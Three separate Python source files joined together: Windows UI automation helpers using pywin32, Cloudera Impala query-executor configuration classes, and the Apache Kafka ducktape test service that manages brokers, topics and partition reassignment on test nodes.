elif err[0] != winrror.ERROR_FILE_NOT_FOUND:
raise err
if hwnd:
win32gui.FlashWindow(hwnd, True)
return hwnd
def FindWindowWithTitleAndText(title, text):
"""Checks if the any window has given title, and child window has the text.
Args:
title: Expected window title.
text: Expected window text substring(in any child window), case-insensitive.
Returns:
A list how HWND that meets the search condition.
"""
hwnds_title_matched = FindWindowsWithTitle(title)
if not hwnds_title_matched:
logging.info('No window has title: [%s].', title)
hwnds = []
for hwnd in hwnds_title_matched:
if FindWindowsWithText(hwnd, text):
hwnds.append(hwnd)
return hwnds
def WaitForWindow(title, class_name, timeout=30):
"""Waits for window with given title and class to appear.
Args:
title: Windows title to search.
class_name: Class name of the window to search.
timeout: How long should wait before give up.
Returns:
A tuple of (HWND, title) of the found window, or (None, None) otherwise.
"""
logging.info('ui.WaitForWindow("%s", "%s") for %s seconds', title,
class_name, timeout)
hwnd = None
start = time.perf_counter()
stop = start + int(timeout)
while time.perf_counter() < stop:
hwnd = FindWindow(title, class_name)
if hwnd:
elapsed = time.perf_counter() - start
logging.info('Window ["%s"] found in %f seconds', title, elapsed)
return (hwnd, title)
logging.info('Window with title [%s] has not appeared yet.', title)
time.sleep(0.5)
logging.warning('WARNING: (%s,"%s") not found within %f seconds', title,
class_name, timeout)
return (None, None)
def ClickButton(button_hwnd):
"""Clicks a button window by sending a BM_CLICK message.
Per http://msdn2.microsoft.com/en-us/library/bb775985.aspx
"If the button is in a dialog box and the dialog box is not active, the
BM_CLICK message might fail. To ensure success in this situation, call
the SetActiveWindow function to activate the dialog box before sending
the BM_CLICK message to the button."
Args:
button_hwnd: HWND to the button to be clicked.
"""
previous_active_window = win32gui.SetActiveWindow(button_hwnd)
win32gui.PostMessage(button_hwnd, win32con.BM_CLICK, 0, 0)
if previous_active_window:
win32gui.SetActiveWindow(previous_active_window)
def ClickChildButtonWithText(parent_hwnd, button_text):
"""Clicks a child button window with given text.
Args:
parent_hwnd: HWND of the button parent.
button_text: Button windows title.
Returns:
Whether button is clicked.
"""
button_hwnd = FindWindow(button_text, 'Button', parent_hwnd)
if button_hwnd:
logging.debug('Found child button with: %s', button_text)
ClickButton(button_hwnd)
return True
logging.debug('No button with [%s] found.', button_text)
return False
def SendKeyToWindow(hwnd, key_to_press):
"""Sends a key press to the window.
This is a blocking call until all keys are pressed.
Args:
hwnd: handle of the window to press key.
key_to_press: Actual key to send to window. eg.'{Enter}'. See `window_shell`
documentation for key definitions.
"""
try:
window_shell = win32com.client.Dispatch('WScript.Shell')
SetForegroundWindow(hwnd)
window_shell.AppActivate(str(win32gui.GetForegroundWindow()))
window_shell.SendKeys(key_to_press)
logging.info('Sent %s to window %x.', key_to_press, hwnd)
except pywintypes.error as err:
logging.error('Failed to press key: %s', err)
raise
except pythoncom.com_error as err:
logging.error('COM exception occurred: %s, is CoInitialize() called?', err)
raise
| |
# Copyright (c) 2012 Cloudera, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Module used for executing queries and gathering results.
# The QueryExecutor is meant to be generic and doesn't
# have the knowledge of how to actually execute a query. It takes a query and its config
# and executes is against a executor function.
# For example (in pseudo-code):
#
# def exec_func(query, config):
# ...
#
# config = ImpalaBeeswaxQueryExecConfig()
# executor = QueryExecutor('beeswax', query, config, exec_func)
# executor.run()
# result = executor.result
import logging
import os
from tests.beeswax.impala_beeswax import ImpalaBeeswaxClient, ImpalaBeeswaxResult
from tests.performance.query import Query, HiveQueryResult, ImpalaQueryResult
from impala.dbapi import connect as connect_to_impala
# Setup logging for this module.
logging.basicConfig(level=logging.INFO, format='[%(name)s] %(threadName)s: %(message)s')
LOG = logging.getLogger('query_executor')
LOG.setLevel(level=logging.INFO)
# globals.
hive_result_regex = 'Time taken: (\d*).(\d*) seconds'
## TODO: Split executors into their own modules.
class QueryExecConfig(object):
"""Base Class for Execution Configs
Attributes:
plugin_runner (PluginRunner?)
"""
def __init__(self, plugin_runner=None):
self.plugin_runner = plugin_runner
class ImpalaQueryExecConfig(QueryExecConfig):
"""Base class for Impala query execution config
Attributes:
impalad (str): address of impalad <host>:<port>
"""
def __init__(self, plugin_runner=None, impalad='localhost:21000'):
super(ImpalaQueryExecConfig, self).__init__(plugin_runner=plugin_runner)
self._impalad = impalad
@property
def impalad(self):
return self._impalad
@impalad.setter
def impalad(self, value):
self._impalad = value
class JdbcQueryExecConfig(ImpalaQueryExecConfig):
"""Impala query execution config for jdbc
Attributes:
tranport (?): ?
"""
JDBC_CLIENT_PATH = os.path.join(os.environ['IMPALA_HOME'], 'bin/run-jdbc-client.sh')
def __init__(self, plugin_runner=None, impalad='localhost:21050', transport=None):
super(JdbcQueryExecConfig, self).__init__(plugin_runner=plugin_runner,
impalad=impalad)
self.transport = transport
@property
def jdbc_client_cmd(self):
"""The args to run the jdbc client.
Constructed on the fly, since the impalad it points to can change.
"""
return JdbcQueryExecConfig.JDBC_CLIENT_PATH + ' -i "%s" -t %s' % (self._impalad,
self.transport)
class ImpalaHS2QueryConfig(ImpalaQueryExecConfig):
def __init__(self, use_kerberos=False, impalad="localhost:21050", plugin_runner=None):
super(ImpalaHS2QueryConfig, self).__init__(plugin_runner=plugin_runner,
impalad=impalad)
# TODO Use a config dict for query execution options similar to HS2
self.use_kerberos = use_kerberos
class HiveHS2QueryConfig(QueryExecConfig):
def __init__(self,
plugin_runner=None,
exec_options = None,
use_kerberos=False,
user=None,
hiveserver='localhost'):
super(HiveHS2QueryConfig, self).__init__()
self.exec_options = dict()
self._build_options(exec_options)
self.use_kerberos = use_kerberos
self.user = user
self.hiveserver = hiveserver
def _build_options(self, exec_options):
"""Read the exec_options into self.exec_options
Args:
exec_options (str): String formatted as "command1;command2"
"""
if exec_options:
# exec_options are seperated by ; on the command line
options = exec_options.split(';')
for option in options:
key, value = option.split(':')
# The keys in HiveService QueryOptions are lower case.
self.exec_options[key.lower()] = value
class BeeswaxQueryExecConfig(ImpalaQueryExecConfig):
"""Impala query execution config for beeswax
Args:
use_kerberos (boolean)
exec_options (str): String formatted as "opt1:val1;opt2:val2"
impalad (str): address of impalad <host>:<port>
plugin_runner (?): ?
Attributes:
use_kerberos (boolean)
exec_options (dict str -> str): execution options
"""
def __init__(self, use_kerberos=False, exec_options=None, impalad='localhost:21000',
plugin_runner=None):
super(BeeswaxQueryExecConfig, self).__init__(plugin_runner=plugin_runner,
impalad=impalad)
self.use_kerberos = use_kerberos
self.exec_options = dict()
self._build_options(exec_options)
def _build_options(self, exec_options):
"""Read the exec_options into self.exec_options
Args:
exec_options (str): String formatted as "opt1:val1;opt2:val2"
"""
if exec_options:
# exec_options are seperated by ; on the command line
options = exec_options.split(';')
for option in options:
key, value = option.split(':')
# The keys in ImpalaService QueryOptions are upper case.
self.exec_options[key.upper()] = value
class QueryExecutor(object):
"""Executes a query.
Args:
name (str): eg. "hive"
query (str): string containing SQL query to be executed
func (function): Function that accepts a QueryExecOption parameter and returns a
ImpalaQueryResult. Eg. execute_using_impala_beeswax
config (QueryExecOption)
exit_on_error (boolean): Exit right after an error encountered.
Attributes:
exec_func (function): Function that accepts a QueryExecOption parameter and returns a
ImpalaQueryResult.
exec_config (QueryExecOption)
query (str): string containing SQL query to be executed
exit_on_error (boolean): Exit right after an error encountered.
executor_name (str): eg. "hive"
result (ImpalaQueryResult): Contains the result after execute method is called.
"""
def __init__(self, name, query, func, config, exit_on_error):
self.exec_func = func
self.exec_config = config
self.query = query
self.exit_on_error = exit_on_error
self.executor_name = name
self._result = None
def prepare(self, impalad):
"""Prepare the query to be run.
For now, this sets the impalad that the query connects to. If the executor is hive,
it's a no op.
"""
if 'hive' not in self.executor_name:
self.exec_config.impalad = impalad
def execute(self):
"""Execute the query using the given execution function"""
LOG.debug('Executing %s' % self.query)
self._result = self.exec_func(self.query, self.exec_config)
if not self._result.success:
if self.exit_on_error:
raise RuntimeError(self._result.query_error)
else:
LOG.info("Continuing execution")
@property
def result(self):
"""Getter for the result of the query execution.
A result is a ImpalaQueryResult object that contains the details of a single run of
the query.
"""
return self._result
| |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import json
import os.path
import re
import signal
import time
from ducktape.services.service import Service
from ducktape.utils.util import wait_until
from ducktape.cluster.remoteaccount import RemoteCommandError
from config import KafkaConfig
from kafkatest.directory_layout.kafka_path import KafkaPathResolverMixin
from kafkatest.services.kafka import config_property
from kafkatest.services.monitor.jmx import JmxMixin
from kafkatest.services.security.minikdc import MiniKdc
from kafkatest.services.security.security_config import SecurityConfig
from kafkatest.version import DEV_BRANCH, LATEST_0_10_0
Port = collections.namedtuple('Port', ['name', 'number', 'open'])
class KafkaService(KafkaPathResolverMixin, JmxMixin, Service):
PERSISTENT_ROOT = "/mnt/kafka"
STDOUT_STDERR_CAPTURE = os.path.join(PERSISTENT_ROOT, "server-start-stdout-stderr.log")
LOG4J_CONFIG = os.path.join(PERSISTENT_ROOT, "kafka-log4j.properties")
# Logs such as controller.log, server.log, etc all go here
OPERATIONAL_LOG_DIR = os.path.join(PERSISTENT_ROOT, "kafka-operational-logs")
OPERATIONAL_LOG_INFO_DIR = os.path.join(OPERATIONAL_LOG_DIR, "info")
OPERATIONAL_LOG_DEBUG_DIR = os.path.join(OPERATIONAL_LOG_DIR, "debug")
# Kafka log segments etc go here
DATA_LOG_DIR_PREFIX = os.path.join(PERSISTENT_ROOT, "kafka-data-logs")
DATA_LOG_DIR_1 = "%s-1" % (DATA_LOG_DIR_PREFIX)
DATA_LOG_DIR_2 = "%s-2" % (DATA_LOG_DIR_PREFIX)
CONFIG_FILE = os.path.join(PERSISTENT_ROOT, "kafka.properties")
# Kafka Authorizer
SIMPLE_AUTHORIZER = "kafka.security.auth.SimpleAclAuthorizer"
logs = {
"kafka_server_start_stdout_stderr": {
"path": STDOUT_STDERR_CAPTURE,
"collect_default": True},
"kafka_operational_logs_info": {
"path": OPERATIONAL_LOG_INFO_DIR,
"collect_default": True},
"kafka_operational_logs_debug": {
"path": OPERATIONAL_LOG_DEBUG_DIR,
"collect_default": False},
"kafka_data_1": {
"path": DATA_LOG_DIR_1,
"collect_default": False},
"kafka_data_2": {
"path": DATA_LOG_DIR_2,
"collect_default": False}
}
def __init__(self, context, num_nodes, zk, security_protocol=SecurityConfig.PLAINTEXT, interbroker_security_protocol=SecurityConfig.PLAINTEXT,
client_sasl_mechanism=SecurityConfig.SASL_MECHANISM_GSSAPI, interbroker_sasl_mechanism=SecurityConfig.SASL_MECHANISM_GSSAPI,
authorizer_class_name=None, topics=None, version=DEV_BRANCH, jmx_object_names=None,
jmx_attributes=None, zk_connect_timeout=5000, zk_session_timeout=6000, server_prop_overides=None, zk_chroot=None):
"""
:type context
:type zk: ZookeeperService
:type topics: dict
"""
Service.__init__(self, context, num_nodes)
JmxMixin.__init__(self, num_nodes=num_nodes, jmx_object_names=jmx_object_names, jmx_attributes=(jmx_attributes or []),
root=KafkaService.PERSISTENT_ROOT)
self.zk = zk
self.security_protocol = security_protocol
self.interbroker_security_protocol = interbroker_security_protocol
self.client_sasl_mechanism = client_sasl_mechanism
self.interbroker_sasl_mechanism = interbroker_sasl_mechanism
self.topics = topics
self.minikdc = None
self.authorizer_class_name = authorizer_class_name
self.zk_set_acl = False
if server_prop_overides is None:
self.server_prop_overides = []
else:
self.server_prop_overides = server_prop_overides
self.log_level = "DEBUG"
self.zk_chroot = zk_chroot
#
# In a heavily loaded and not very fast machine, it is
# sometimes necessary to give more time for the zk client
# to have its session established, especially if the client
# is authenticating and waiting for the SaslAuthenticated
# in addition to the SyncConnected event.
#
# The default value for zookeeper.connect.timeout.ms is
# 2 seconds and here we increase it to 5 seconds, but
# it can be overridden by setting the corresponding parameter
# for this constructor.
self.zk_connect_timeout = zk_connect_timeout
# Also allow the session timeout to be provided explicitly,
# primarily so that test cases can depend on it when waiting
# e.g. brokers to deregister after a hard kill.
self.zk_session_timeout = zk_session_timeout
self.port_mappings = {
'PLAINTEXT': Port('PLAINTEXT', 9092, False),
'SSL': Port('SSL', 9093, False),
'SASL_PLAINTEXT': Port('SASL_PLAINTEXT', 9094, False),
'SASL_SSL': Port('SASL_SSL', 9095, False)
}
for node in self.nodes:
node.version = version
node.config = KafkaConfig(**{config_property.BROKER_ID: self.idx(node)})
def set_version(self, version):
for node in self.nodes:
node.version = version
@property
def security_config(self):
config = SecurityConfig(self.context, self.security_protocol, self.interbroker_security_protocol,
zk_sasl=self.zk.zk_sasl,
client_sasl_mechanism=self.client_sasl_mechanism, interbroker_sasl_mechanism=self.interbroker_sasl_mechanism)
for protocol in self.port_mappings:
port = self.port_mappings[protocol]
if port.open:
config.enable_security_protocol(port.name)
return config
def open_port(self, protocol):
self.port_mappings[protocol] = self.port_mappings[protocol]._replace(open=True)
def close_port(self, protocol):
self.port_mappings[protocol] = self.port_mappings[protocol]._replace(open=False)
def start_minikdc(self, add_principals=""):
if self.security_config.has_sasl:
if self.minikdc is None:
self.minikdc = MiniKdc(self.context, self.nodes, extra_principals = add_principals)
self.minikdc.start()
else:
self.minikdc = None
def alive(self, node):
return len(self.pids(node)) > 0
def start(self, add_principals=""):
self.open_port(self.security_protocol)
self.open_port(self.interbroker_security_protocol)
self.start_minikdc(add_principals)
self._ensure_zk_chroot()
Service.start(self)
self.logger.info("Waiting for brokers to register at ZK")
retries = 30
expected_broker_ids = set(self.nodes)
wait_until(lambda: {node for node in self.nodes if self.is_registered(node)} == expected_broker_ids, 30, 1)
if retries == 0:
raise RuntimeError("Kafka servers didn't register at ZK within 30 seconds")
# Create topics if necessary
if self.topics is not None:
for topic, topic_cfg in self.topics.items():
if topic_cfg is None:
topic_cfg = {}
topic_cfg["topic"] = topic
self.create_topic(topic_cfg)
def _ensure_zk_chroot(self):
self.logger.info("Ensuring zk_chroot %s exists", self.zk_chroot)
if self.zk_chroot:
if not self.zk_chroot.startswith('/'):
raise Exception("Zookeeper chroot must start with '/' but found " + self.zk_chroot)
parts = self.zk_chroot.split('/')[1:]
for i in range(len(parts)):
self.zk.create('/' + '/'.join(parts[:i+1]))
def set_protocol_and_port(self, node):
listeners = []
advertised_listeners = []
for protocol in self.port_mappings:
port = self.port_mappings[protocol]
if port.open:
listeners.append(port.name + "://:" + str(port.number))
advertised_listeners.append(port.name + "://" + node.account.hostname + ":" + str(port.number))
self.listeners = ','.join(listeners)
self.advertised_listeners = ','.join(advertised_listeners)
def prop_file(self, node):
cfg = KafkaConfig(**node.config)
cfg[config_property.ADVERTISED_HOSTNAME] = node.account.hostname
cfg[config_property.ZOOKEEPER_CONNECT] = self.zk_connect_setting()
for prop in self.server_prop_overides:
cfg[prop[0]] = prop[1]
self.set_protocol_and_port(node)
# TODO - clean up duplicate configuration logic
prop_file = cfg.render()
prop_file += self.render('kafka.properties', node=node, broker_id=self.idx(node),
security_config=self.security_config, num_nodes=self.num_nodes)
return prop_file
def start_cmd(self, node):
cmd = "export JMX_PORT=%d; " % self.jmx_port
cmd += "export KAFKA_LOG4J_OPTS=\"-Dlog4j.configuration=file:%s\"; " % self.LOG4J_CONFIG
cmd += "export KAFKA_OPTS=%s; " % self.security_config.kafka_opts
cmd += "%s %s 1>> %s 2>> %s &" % \
(self.path.script("kafka-server-start.sh", node),
KafkaService.CONFIG_FILE,
KafkaService.STDOUT_STDERR_CAPTURE,
KafkaService.STDOUT_STDERR_CAPTURE)
return cmd
def start_node(self, node):
node.account.mkdirs(KafkaService.PERSISTENT_ROOT)
prop_file = self.prop_file(node)
self.logger.info("kafka.properties:")
self.logger.info(prop_file)
node.account.create_file(KafkaService.CONFIG_FILE, prop_file)
node.account.create_file(self.LOG4J_CONFIG, self.render('log4j.properties', log_dir=KafkaService.OPERATIONAL_LOG_DIR))
self.security_config.setup_node(node)
self.security_config.setup_credentials(node, self.path, self.zk_connect_setting(), broker=True)
cmd = self.start_cmd(node)
self.logger.debug("Attempting to start KafkaService on %s with command: %s" % (str(node.account), cmd))
with node.account.monitor_log(KafkaService.STDOUT_STDERR_CAPTURE) as monitor:
node.account.ssh(cmd)
# Kafka 1.0.0 and higher don't have a space between "Kafka" and "Server"
monitor.wait_until("Kafka\s*Server.*started", timeout_sec=30, backoff_sec=.25, err_msg="Kafka server didn't finish startup")
# Credentials for inter-broker communication are created before starting Kafka.
# Client credentials are created after starting Kafka so that both loading of
# existing credentials from ZK and dynamic update of credentials in Kafka are tested.
self.security_config.setup_credentials(node, self.path, self.zk_connect_setting(), broker=False)
self.start_jmx_tool(self.idx(node), node)
if len(self.pids(node)) == 0:
raise Exception("No process ids recorded on node %s" % node.account.hostname)
def pids(self, node):
"""Return process ids associated with running processes on the given node."""
try:
cmd = "jcmd | grep -e %s | awk '{print $1}'" % self.java_class_name()
pid_arr = [pid for pid in node.account.ssh_capture(cmd, allow_fail=True, callback=int)]
return pid_arr
except (RemoteCommandError, ValueError) as e:
return []
def signal_node(self, node, sig=signal.SIGTERM):
pids = self.pids(node)
for pid in pids:
node.account.signal(pid, sig)
def signal_leader(self, topic, partition=0, sig=signal.SIGTERM):
leader = self.leader(topic, partition)
self.signal_node(leader, sig)
def stop_node(self, node, clean_shutdown=True):
pids = self.pids(node)
sig = signal.SIGTERM if clean_shutdown else signal.SIGKILL
for pid in pids:
node.account.signal(pid, sig, allow_fail=False)
try:
wait_until(lambda: len(self.pids(node)) == 0, timeout_sec=60, err_msg="Kafka node failed to stop")
except Exception:
self.thread_dump(node)
raise
def thread_dump(self, node):
for pid in self.pids(node):
try:
node.account.signal(pid, signal.SIGQUIT, allow_fail=True)
except:
self.logger.warn("Could not dump threads on node")
def clean_node(self, node):
JmxMixin.clean_node(self, node)
self.security_config.clean_node(node)
node.account.kill_java_processes(self.java_class_name(),
clean_shutdown=False, allow_fail=True)
node.account.ssh("sudo rm -rf -- %s" % KafkaService.PERSISTENT_ROOT, allow_fail=False)
def create_topic(self, topic_cfg, node=None):
"""Run the admin tool create topic command.
Specifying node is optional, and may be done if for different kafka nodes have different versions,
and we care where command gets run.
If the node is not specified, run the command from self.nodes[0]
"""
if node is None:
node = self.nodes[0]
self.logger.info("Creating topic %s with settings %s",
topic_cfg["topic"], topic_cfg)
kafka_topic_script = self.path.script("kafka-topics.sh", node)
cmd = kafka_topic_script + " "
cmd += "--zookeeper %(zk_connect)s --create --topic %(topic)s " % {
'zk_connect': self.zk_connect_setting(),
'topic': topic_cfg.get("topic"),
}
if 'replica-assignment' in topic_cfg:
cmd += " --replica-assignment %(replica-assignment)s" % {
'replica-assignment': topic_cfg.get('replica-assignment')
}
else:
cmd += " --partitions %(partitions)d --replication-factor %(replication-factor)d" % {
'partitions': topic_cfg.get('partitions', 1),
'replication-factor': topic_cfg.get('replication-factor', 1)
}
if topic_cfg.get('if-not-exists', False):
cmd += ' --if-not-exists'
if "configs" in topic_cfg.keys() and topic_cfg["configs"] is not None:
for config_name, config_value in topic_cfg["configs"].items():
cmd += " --config %s=%s" % (config_name, str(config_value))
self.logger.info("Running topic creation command...\n%s" % cmd)
node.account.ssh(cmd)
time.sleep(1)
self.logger.info("Checking to see if topic was properly created...\n%s" % cmd)
for line in self.describe_topic(topic_cfg["topic"]).split("\n"):
self.logger.info(line)
def describe_topic(self, topic, node=None):
if node is None:
node = self.nodes[0]
cmd = "%s --zookeeper %s --topic %s --describe" % \
(self.path.script("kafka-topics.sh", node), self.zk_connect_setting(), topic)
output = ""
for line in node.account.ssh_capture(cmd):
output += line
return output
def list_topics(self, topic, node=None):
if node is None:
node = self.nodes[0]
cmd = "%s --zookeeper %s --list" % \
(self.path.script("kafka-topics.sh", node), self.zk_connect_setting())
for line in node.account.ssh_capture(cmd):
if not line.startswith("SLF4J"):
yield line.rstrip()
def alter_message_format(self, topic, msg_format_version, node=None):
if node is None:
node = self.nodes[0]
self.logger.info("Altering message format version for topic %s with format %s", topic, msg_format_version)
cmd = "%s --zookeeper %s --entity-name %s --entity-type topics --alter --add-config message.format.version=%s" % \
(self.path.script("kafka-configs.sh", node), self.zk_connect_setting(), topic, msg_format_version)
self.logger.info("Running alter message format command...\n%s" % cmd)
node.account.ssh(cmd)
def parse_describe_topic(self, topic_description):
"""Parse output of kafka-topics.sh --describe (or describe_topic() method above), which is a string of form
PartitionCount:2\tReplicationFactor:2\tConfigs:
Topic: test_topic\ttPartition: 0\tLeader: 3\tReplicas: 3,1\tIsr: 3,1
Topic: test_topic\tPartition: 1\tLeader: 1\tReplicas: 1,2\tIsr: 1,2
into a dictionary structure appropriate for use with reassign-partitions tool:
{
"partitions": [
{"topic": "test_topic", "partition": 0, "replicas": [3, 1]},
{"topic": "test_topic", "partition": 1, "replicas": [1, 2]}
]
}
"""
lines = map(lambda x: x.strip(), topic_description.split("\n"))
partitions = []
for line in lines:
m = re.match(".*Leader:.*", line)
if m is None:
continue
fields = line.split("\t")
# ["Partition: 4", "Leader: 0"] -> ["4", "0"]
fields = map(lambda x: x.split(" ")[1], fields)
partitions.append(
{"topic": fields[0],
"partition": int(fields[1]),
"replicas": map(int, fields[3].split(','))})
return {"partitions": partitions}
def verify_reassign_partitions(self, reassignment, node=None):
"""Run the reassign partitions admin tool in "verify" mode
"""
if node is None:
node = self.nodes[0]
json_file = "/tmp/%s_reassign.json" % str(time.time())
# reassignment to json
json_str = json.dumps(reassignment)
json_str = json.dumps(json_str)
# create command
cmd = "echo %s > %s && " % (json_str, json_file)
cmd += "%s " % self.path.script("kafka-reassign-partitions.sh", node)
cmd += "--zookeeper %s " % self.zk_connect_setting()
cmd += "--reassignment-json-file %s " % json_file
cmd += "--verify "
cmd += "&& sleep 1 && rm -f %s" % json_file
# send command
self.logger.info("Verifying parition reassignment...")
self.logger.debug(cmd)
output = ""
for line in node.account.ssh_capture(cmd):
output += line
self.logger.debug(output)
if re.match(".*Reassignment of partition.*failed.*",
output.replace('\n', '')) is not None:
return False
if re.match(".*is still in progress.*",
output.replace('\n', '')) is not None:
return False
return True
def execute_reassign_partitions(self, reassignment, node=None,
throttle=None):
"""Run the reassign partitions admin tool in "verify" mode
"""
if node is None:
node = self.nodes[0]
json_file = "/tmp/%s_reassign.json" % str(time.time())
# reassignment to json
json_str = json.dumps(reassignment)
json_str = json.dumps(json_str)
# create command
cmd = "echo %s > %s && " % (json_str, json_file)
cmd += "%s " % self.path.script( "kafka-reassign-partitions.sh", node)
cmd += "--zookeeper %s " % self.zk_connect_setting()
cmd += "--reassignment-json-file %s " % json_file
cmd += "--execute"
if throttle is not None:
cmd += " --throttle %d" % throttle
cmd += " && sleep 1 && rm -f %s" % json_file
# send command
self.logger.info("Executing parition reassignment...")
self.logger.debug(cmd)
output = ""
for line in node.account.ssh_capture(cmd):
output += line
self.logger.debug("Verify partition reassignment:")
self.logger.debug(output)
def search_data_files(self, topic, messages):
"""Check if a set of messages made it into the Kakfa data files. Note that
this method takes no account of replication. It simply looks for the
payload in all the partition files of the specified topic. 'messages' should be
an array of numbers. The list of missing messages is returned.
"""
payload_match = "payload: " + "$|payload: ".join(str(x) for x in messages) + "$"
found = set([])
self.logger.debug("number of unique missing messages we will search for: %d",
len(messages))
for node in self.nodes:
# Grab all .log files in directories prefixed with this topic
files = node.account.ssh_capture("find %s* -regex '.*/%s-.*/[^/]*.log'" % (KafkaService.DATA_LOG_DIR_PREFIX, topic))
# Check each data file to see if it contains the messages we want
for log in files:
cmd = "%s kafka.tools.DumpLogSegments --print-data-log --files %s | grep -E \"%s\"" % \
(self.path.script("kafka-run-class.sh", node), log.strip(), payload_match)
for line in node.account.ssh_capture(cmd, allow_fail=True):
for val in messages:
if line.strip().endswith("payload: "+str(val)):
self.logger.debug("Found %s in data-file [%s] in line: [%s]" % (val, log.strip(), line.strip()))
found.add(val)
self.logger.debug("Number of unique messages found in the log: %d",
len(found))
missing = list(set(messages) - found)
if len(missing) > 0:
self.logger.warn("The following values were not found in the data files: " + str(missing))
return missing
def restart_node(self, node, clean_shutdown=True):
"""Restart the given node."""
self.stop_node(node, clean_shutdown)
self.start_node(node)
def isr_idx_list(self, topic, partition=0):
""" Get in-sync replica list the given topic and partition.
"""
self.logger.debug("Querying zookeeper to find in-sync replicas for topic %s and partition %d" % (topic, partition))
zk_path = "/brokers/topics/%s/partitions/%d/state" % (topic, partition)
partition_state = self.zk.query(zk_path, chroot=self.zk_chroot)
if partition_state is None:
raise Exception("Error finding partition state for topic %s and partition %d." % (topic, partition))
partition_state = json.loads(partition_state)
self.logger.info(partition_state)
isr_idx_list = partition_state["isr"]
self.logger.info("Isr for topic %s and partition %d is now: %s" % (topic, partition, isr_idx_list))
return isr_idx_list
def replicas(self, topic, partition=0):
""" Get the assigned replicas for the given topic and partition.
"""
self.logger.debug("Querying zookeeper to find assigned replicas for topic %s and partition %d" % (topic, partition))
zk_path = "/brokers/topics/%s" % (topic)
assignemnt = self.zk.query(zk_path, chroot=self.zk_chroot)
if assignemnt is None:
raise Exception("Error finding partition state for topic %s and partition %d." % (topic, partition))
assignemnt = json.loads(assignemnt)
self.logger.info(assignemnt)
replicas = assignemnt["partitions"][str(partition)]
self.logger.info("Assigned replicas for topic %s and partition %d is now: %s" % (topic, partition, replicas))
return [self.get_node(replica) for replica in replicas]
def leader(self, topic, partition=0):
""" Get the leader replica for the given topic and partition.
"""
self.logger.debug("Querying zookeeper to find leader replica for topic %s and partition %d" % (topic, partition))
zk_path = "/brokers/topics/%s/partitions/%d/state" % (topic, partition)
partition_state = self.zk.query(zk_path, chroot=self.zk_chroot)
if partition_state is None:
raise Exception("Error finding partition state for topic %s and partition %d." % (topic, partition))
partition_state = json.loads(partition_state)
self.logger.info(partition_state)
leader_idx = int(partition_state["leader"])
self.logger.info("Leader for topic %s and partition %d is now: %d" % (topic, partition, leader_idx))
return self.get_node(leader_idx)
def cluster_id(self):
""" Get the current cluster id
"""
self.logger.debug("Querying ZooKeeper to retrieve cluster id")
cluster = self.zk.query("/cluster/id", chroot=self.zk_chroot)
try:
return json.loads(cluster)['id'] if cluster else None
except:
self.logger.debug("Data in /cluster/id znode could not be parsed. Data = %s" % cluster)
raise
def list_consumer_groups(self, node=None, command_config=None):
""" Get list of consumer groups.
"""
if node is None:
node = self.nodes[0]
consumer_group_script = self.path.script("kafka-consumer-groups.sh", node)
if command_config is None:
command_config = ""
else:
command_config = "--command-config " + command_config
cmd = "%s --bootstrap-server %s %s --list" % \
(consumer_group_script,
self.bootstrap_servers(self.security_protocol),
command_config)
output = ""
self.logger.debug(cmd)
for line in node.account.ssh_capture(cmd):
if not line.startswith("SLF4J"):
output += line
self.logger.debug(output)
return output
def describe_consumer_group(self, group, node=None, command_config=None):
""" Describe a consumer group.
"""
if node is None:
node = self.nodes[0]
consumer_group_script = self.path.script("kafka-consumer-groups.sh", node)
if command_config is None:
command_config = ""
else:
command_config = "--command-config " + command_config
cmd = "%s --bootstrap-server %s %s --group %s --describe" % \
(consumer_group_script,
self.bootstrap_servers(self.security_protocol),
command_config, group)
output = ""
self.logger.debug(cmd)
for line in node.account.ssh_capture(cmd):
if not (line.startswith("SLF4J") or line.startswith("TOPIC") or line.startswith("Could not fetch offset")):
output += line
self.logger.debug(output)
return output
def zk_connect_setting(self):
return self.zk.connect_setting(self.zk_chroot)
def bootstrap_servers(self, protocol='PLAINTEXT', validate=True, offline_nodes=[]):
"""Return comma-delimited list of brokers in this cluster formatted as HOSTNAME1:PORT1,HOSTNAME:PORT2,...
This is the format expected by many config files.
"""
port_mapping = self.port_mappings[protocol]
self.logger.info("Bootstrap client port is: " + str(port_mapping.number))
if validate and not port_mapping.open:
raise ValueError("We are retrieving bootstrap servers for the port: %s which is not currently open. - " % str(port_mapping))
return ','.join([node.account.hostname + ":" + str(port_mapping.number) for node in self.nodes if node not in offline_nodes])
def controller(self):
""" Get the controller node
"""
self.logger.debug("Querying zookeeper to find controller broker")
controller_info = self.zk.query("/controller", chroot=self.zk_chroot)
if controller_info is None:
raise Exception("Error finding controller info")
controller_info = json.loads(controller_info)
self.logger.debug(controller_info)
controller_idx = int(controller_info["brokerid"])
self.logger.info("Controller's ID: %d" % (controller_idx))
return self.get_node(controller_idx)
def is_registered(self, node):
"""
Check whether a broker is registered in Zookeeper
"""
self.logger.debug("Querying zookeeper to see if broker %s is registered", node)
broker_info = self.zk.query("/brokers/ids/%s" % self.idx(node), chroot=self.zk_chroot)
self.logger.debug("Broker info: %s", broker_info)
return broker_info is not None
def get_offset_shell(self, topic, partitions, max_wait_ms, offsets, time):
node = self.nodes[0]
cmd = self.path.script("kafka-run-class.sh", node)
cmd += " kafka.tools.GetOffsetShell"
cmd += " --topic %s --broker-list %s --max-wait-ms %s --offsets %s --time %s" % (topic, self.bootstrap_servers(self.security_protocol), max_wait_ms, offsets, time)
if partitions:
cmd += ' --partitions %s' % partitions
cmd += " 2>> %s/get_offset_shell.log" % KafkaService.PERSISTENT_ROOT
cmd += " | tee -a %s/get_offset_shell.log &" % KafkaService.PERSISTENT_ROOT
output = ""
self.logger.debug(cmd)
for line in node.account.ssh_capture(cmd):
output += line
